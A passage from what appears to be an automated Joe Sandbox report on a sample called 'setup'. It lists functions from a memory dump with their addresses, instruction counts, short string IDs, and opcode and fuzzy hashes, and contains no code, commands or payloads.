                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: nhi
                                                                                                                                                                                                                                  • API String ID: 0-409182551
                                                                                                                                                                                                                                  • Opcode ID: 379a3d5a1608591c71ede433d46cb63d8e0c3251537054a0cf2f2dbd63d251d7
                                                                                                                                                                                                                                  • Instruction ID: b916f16bb3d951b1f18d8c3b9ea867ed3a2b9261232721008855655841fa74bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 379a3d5a1608591c71ede433d46cb63d8e0c3251537054a0cf2f2dbd63d251d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AC139316093809BD710CF16C891A2FBFE6EFDA714F19862CE9D567252D334DC068B92
                                                                                                                                                                                                                                  Function 007F245D Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $' !
                                                                                                                                                                                                                                  • API String ID: 0-3942351852
                                                                                                                                                                                                                                  • Opcode ID: c0794b42a59bf10cae9407214c4302adb09d7854a1358dffda2a06566277bd68
                                                                                                                                                                                                                                  • Instruction ID: 3d6593912c4df199cc07889ab75569f809b493768a0cdf3ebd799037172652f5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0794b42a59bf10cae9407214c4302adb09d7854a1358dffda2a06566277bd68
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7C13573B183148BC728CF68C88167BB7E2EBD4314F19C63DD9959B396D6789C068B81
                                                                                                                                                                                                                                  Function 007DBE5D Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                                                                                  • Opcode ID: 31eefb2653985a404e31f65c27234c30e56dc391173a9806b6fd48e9e1f28c00
                                                                                                                                                                                                                                  • Instruction ID: 471319ca56264884181388da236fcb018a4e6d643783e56178b738b90e62d52e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31eefb2653985a404e31f65c27234c30e56dc391173a9806b6fd48e9e1f28c00
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8D113B2A083159FC715CF25C89176BB7F9AF85310F09856EE9998B382D738ED04C792
                                                                                                                                                                                                                                  Function 007F203D Relevance: 1.6, Strings: 1, Instructions: 379COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: yiP
                                                                                                                                                                                                                                  • API String ID: 0-2938885043
                                                                                                                                                                                                                                  • Opcode ID: 723321e64742fe5c8f96fcc36a7b2dc2a3e02716aa6041e7c89ee0aabc2eb214
                                                                                                                                                                                                                                  • Instruction ID: bc86c88d59f909d1c46c320e94a1982e0529232fb255a966e2e6ba7a92d272d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 723321e64742fe5c8f96fcc36a7b2dc2a3e02716aa6041e7c89ee0aabc2eb214
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CC1F972A083159FC728CF68C89163BB7E2FF99310F19852CEA955B355DB74AC12CB81
                                                                                                                                                                                                                                  Function 007C8FEF Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: J
                                                                                                                                                                                                                                  • API String ID: 0-2715717022
                                                                                                                                                                                                                                  • Opcode ID: e4b548331e54867d10f6836c7a77b8af33d52e6a38509ee1d9ec26f05ffed98c
                                                                                                                                                                                                                                  • Instruction ID: 01fca7fc76fad7297eae358a2c95cf1b653a7ef03f5dc4e0467a4d9914a4bdea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4b548331e54867d10f6836c7a77b8af33d52e6a38509ee1d9ec26f05ffed98c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 819132729083228BC724DF28C8D1BABB7E1FFA9790F09856DD9C55B255E7788C40C782
                                                                                                                                                                                                                                  Function 007E102A Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (]4h
                                                                                                                                                                                                                                  • API String ID: 0-3638951859
                                                                                                                                                                                                                                  • Opcode ID: df52bcd5a0c2d51778e398d7795bba53b2089c1f89c5e0da0df1797454fe148b
                                                                                                                                                                                                                                  • Instruction ID: e5519fba3b860fab93d40929bb268ae3d8155092dabedc604ab8e1ba5cb1e3e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df52bcd5a0c2d51778e398d7795bba53b2089c1f89c5e0da0df1797454fe148b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53C10372609BC08BD3259A388856397BFD25FD6224F1CCA7CD5FE8B386D678A405C712
                                                                                                                                                                                                                                  Function 007CF0CD Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ~
                                                                                                                                                                                                                                  • API String ID: 0-1707062198
                                                                                                                                                                                                                                  • Opcode ID: 77142725aecb41034d2cf3f51c6f505188d3e5529c591782aacb136d5074e5eb
                                                                                                                                                                                                                                  • Instruction ID: 6d9a650f005e60502f2dd711cf2e11dae1d4c5a166cde2da43b78e1b8c35501e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77142725aecb41034d2cf3f51c6f505188d3e5529c591782aacb136d5074e5eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF815B729046658FCB21CE28C8407AEBBD2AB85320F1DC27DECB99B391D6389C05D7D1
                                                                                                                                                                                                                                  Function 007BA7FD Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ~u
                                                                                                                                                                                                                                  • API String ID: 0-3490366260
                                                                                                                                                                                                                                  • Opcode ID: 2286c1c7dd9505d674ef0269971a0b13168a6a34307288c8f1717342c4bdf395
                                                                                                                                                                                                                                  • Instruction ID: d8f611bf595489f08816235bae051f9aa5364293ee960652d5d99c4b206d1813
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2286c1c7dd9505d674ef0269971a0b13168a6a34307288c8f1717342c4bdf395
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B961F52150C3829ADB05CF3984907BBFFE19FA3354F1889ADE4D597283D329890AD727
                                                                                                                                                                                                                                  Function 007D3F7D Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: v
                                                                                                                                                                                                                                  • API String ID: 0-38809212
                                                                                                                                                                                                                                  • Opcode ID: 97ee3515aa266b9618cef8850d0f539103d02c0b8468378cc7feb63fea056fdf
                                                                                                                                                                                                                                  • Instruction ID: a40e625470435026b96322036d85b6c7150a36052fc55012b4068d32149d58bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97ee3515aa266b9618cef8850d0f539103d02c0b8468378cc7feb63fea056fdf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4751E3B2A002148BCB149F28CC92777B3F1EF95324F19966EE996CB380F67D9945C361
                                                                                                                                                                                                                                  Function 007C3A8C Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: [
                                                                                                                                                                                                                                  • API String ID: 0-784033777
                                                                                                                                                                                                                                  • Opcode ID: 17d42812e71ec6b406629d2ced997dfd173dcf86efe2a1358a5a3af652984e9d
                                                                                                                                                                                                                                  • Instruction ID: 78654b9998040aac342b0abc0f295b8368c48158c7c0472425c081f14428480d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17d42812e71ec6b406629d2ced997dfd173dcf86efe2a1358a5a3af652984e9d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF81D47160D7408BC754AF3884857AEBBE5AFD5320F188B2DE5E6C33D2DA78C9458B42
                                                                                                                                                                                                                                  Function 007CF58D Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: h
                                                                                                                                                                                                                                  • API String ID: 0-2439710439
                                                                                                                                                                                                                                  • Opcode ID: 91475a3c4ea5cd05e9afd2c27a4badc592c3fef05a2ed2e2de49533248333b4f
                                                                                                                                                                                                                                  • Instruction ID: aaecd202dc5fed6a1db95402ec3de09a7e1ffeaebc7b4a2194904970d4ded9f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91475a3c4ea5cd05e9afd2c27a4badc592c3fef05a2ed2e2de49533248333b4f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B611426609AD04BE3288E3C5C217AA7B930BD6330F2DC77EE5F5873E6D9698C058351
                                                                                                                                                                                                                                  Function 007EF828 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: |&E
                                                                                                                                                                                                                                  • API String ID: 0-1740799517
                                                                                                                                                                                                                                  • Opcode ID: 0076119f72998274793b81904dcfd29d731f8da1c7c459fe2eee17af497cb2be
                                                                                                                                                                                                                                  • Instruction ID: 261415cab4f3a8fbe0718d9194bcd354088db2556e1ac2ed45fd36082e3cb399
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0076119f72998274793b81904dcfd29d731f8da1c7c459fe2eee17af497cb2be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B45148B6E112518BDB18CF65CC5167AF7B2FF99304B29846DC886EB355DB389C02CB90
                                                                                                                                                                                                                                  Function 007BD262 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 23,
                                                                                                                                                                                                                                  • API String ID: 0-449553388
                                                                                                                                                                                                                                  • Opcode ID: c73b1cc826aa3ff35369b0e82b3f993862c25cade2a4ba084e5d4e81b1586282
                                                                                                                                                                                                                                  • Instruction ID: 49663b900bf739a61d988428561672b3978844da238f912c9fe6d92f55b17226
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c73b1cc826aa3ff35369b0e82b3f993862c25cade2a4ba084e5d4e81b1586282
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B55135B76483018BD324CF64CC813ABB7E1EFD5314F198A2DE895DB241EB7C88068B46
                                                                                                                                                                                                                                  Function 007C70E7 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                                                                  • API String ID: 0-1553575800
                                                                                                                                                                                                                                  • Opcode ID: f14646b077156f946195db932f0c080d57d58f04390b734aadce18f767e95caa
                                                                                                                                                                                                                                  • Instruction ID: 2eb2f2f570ac464f5827842bba1df30bce924b9d3d67a557639423ad45144da9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f14646b077156f946195db932f0c080d57d58f04390b734aadce18f767e95caa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB412276B146018BD328CF39CC527AAB7D6BBD5300F0DC53CD0AAC7295EA3898098B41
                                                                                                                                                                                                                                  Function 007D9C96 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @A
                                                                                                                                                                                                                                  • API String ID: 0-2960862460
                                                                                                                                                                                                                                  • Opcode ID: 70323e6f44af6267cbf02a4555eebf072987ebd0c81544fb87b3c07ca0919ccb
                                                                                                                                                                                                                                  • Instruction ID: b5a865a01d02910314d269c803e84aabe31c7abec242286739e54b2909a1d6cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70323e6f44af6267cbf02a4555eebf072987ebd0c81544fb87b3c07ca0919ccb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8751A07265C3528FC718CF6894113AFF7E2EBC5304F05882DD0DADB685D634D60A8B96
                                                                                                                                                                                                                                  Function 007BF85D Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: -,#"
                                                                                                                                                                                                                                  • API String ID: 0-696394238
                                                                                                                                                                                                                                  • Opcode ID: 9da631e4e67ab14be31fa0b38b017aecaa17ea06f6c5d763b939801dac355a31
                                                                                                                                                                                                                                  • Instruction ID: 9a9e4bd726d48f0ff0ce3c03f5634d945be31d367e07f1c26b7d26c8921a4f0b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9da631e4e67ab14be31fa0b38b017aecaa17ea06f6c5d763b939801dac355a31
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A131E0746152419BDB19DF20CC61FFEB3E2EB85B04F19897CD482C7159E678A860CB16
                                                                                                                                                                                                                                  Function 007DAA3E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ^&
                                                                                                                                                                                                                                  • API String ID: 0-3085756376
                                                                                                                                                                                                                                  • Opcode ID: 75475964bd3477677ccedb9ffdd39a38b3dec7795d1b7ee7cb60190800a84723
                                                                                                                                                                                                                                  • Instruction ID: e79f023ddbdcd51da9c136ab703e39f2a9eef4b80b6c1c707a7a462536ef6832
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75475964bd3477677ccedb9ffdd39a38b3dec7795d1b7ee7cb60190800a84723
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001FC591081505BDB354E2E46A0330BAF17FD731172CD59A98E79F756D12DCC05C356
                                                                                                                                                                                                                                  Function 007C8073 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: p
                                                                                                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                                                                                                  • Opcode ID: 02adcf4643274f0b86ade04e5d5e6155dd3c5caed2e250c9b60bd1739a160c8d
                                                                                                                                                                                                                                  • Instruction ID: 8bedb5592722aa9b8e08520f85e29be36d61b748a2fd5e6ade24e05d2f7064e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02adcf4643274f0b86ade04e5d5e6155dd3c5caed2e250c9b60bd1739a160c8d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B411043060C3818BD710CE34C4D177ABBA2DBA7349F04945DE4D46B293C67AD94ECB52
                                                                                                                                                                                                                                  Function 007F03B5 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: t
                                                                                                                                                                                                                                  • API String ID: 0-2238339752
                                                                                                                                                                                                                                  • Opcode ID: 8a03b1ec058f6693e5b65694a2d8a0b4df41d7527cafbab5a75dc1862957c3c4
                                                                                                                                                                                                                                  • Instruction ID: 7c9513cca6a34394f71409bbeb02d44ddff0ae04220adeb508ba43f60b3dea6d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a03b1ec058f6693e5b65694a2d8a0b4df41d7527cafbab5a75dc1862957c3c4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F0B436B966259BCB008F68C88855AF791A7DB224F1EDB28CDA8A3352D135DC41C7C8
                                                                                                                                                                                                                                  Function 007B7E5D Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 227b436607d1f292830ccf23a746df5ad7133bab5de58819c4176858df098270
                                                                                                                                                                                                                                  • Instruction ID: fc78d91f3fc0fcb75621ebc2153deaae50acb85da2e48c2cd593b4d945662602
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 227b436607d1f292830ccf23a746df5ad7133bab5de58819c4176858df098270
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E52E1B0908B848FE775DB24C4843E7BBE5AB51314F14492EC5EA47A82CB7DA989C713
                                                                                                                                                                                                                                  Function 007B472D Relevance: .7, Instructions: 659COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 66245f905a8ba0b963f5754f9e1a0143971192a28b1c23856bd93b2750623baa
                                                                                                                                                                                                                                  • Instruction ID: 8427b71be17586cb5d29a15a6c56f77513ba8764bcdc61307d245c236238e792
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66245f905a8ba0b963f5754f9e1a0143971192a28b1c23856bd93b2750623baa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7952AF716083558FCB15CF28C0807EABBE1BF85318F198A6DF8995B342D778E949CB85
                                                                                                                                                                                                                                  Function 007D0BCD Relevance: .6, Instructions: 644COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7c7773d9cbd9dd8e03960a88e453d9d2bca46ff56e326fbfcb3dea88502bfc8d
                                                                                                                                                                                                                                  • Instruction ID: 57b94c76d28cb283545aba643bfbd337b16d004504eceb4edffdbb1eaa6dd0e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c7773d9cbd9dd8e03960a88e453d9d2bca46ff56e326fbfcb3dea88502bfc8d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B526CB0609B818ED325CF3C8805797BFD5AB5A324F148A5EE0FE873D2C77964058B66
                                                                                                                                                                                                                                  Function 007B8C3D Relevance: .6, Instructions: 625COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 39e15bf933866eaa341b681c485ccf4360e05fc4ee0e32aeaaf304759d2d656c
